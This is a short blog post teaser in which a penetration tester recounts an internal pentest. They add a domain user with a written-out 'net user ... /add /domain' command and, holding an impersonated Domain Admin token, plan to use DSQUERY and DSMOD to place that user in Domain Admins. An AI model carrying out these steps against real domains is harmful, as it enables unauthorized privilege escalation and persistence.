Recently on an internal Pentest, I needed to get a new user into the Domain Admins group, which I couldn’t manage to accomplish with the usual net localgroup group username /add /domain command, I had managed to add a user to the domain – daveisahacker – using net user daveisahacker Password123 /add /domain.
I really need to get a user into Domain Admin, and as I had a token impersonation of domain admin, but couldn’t sign on to a DC because I had no password.
So I thinks what about the Directory services commands – DSQUERY, DSMOD, and all of the other DS commands, I might be able to add a user to the Domain Admins group that way.
DSQUERY Command @ Technet
http://technet.microsoft.com/en-us/library/cc732952(WS.10).aspx
DSMOD Command @ Technet
http://technet.microsoft.com/en-us/library/cc732406(WS.10).aspx
So, OK lets have a look at these command and what to do with them.
Continue reading “Active Directory KungFu – Messing With Users & Computers”
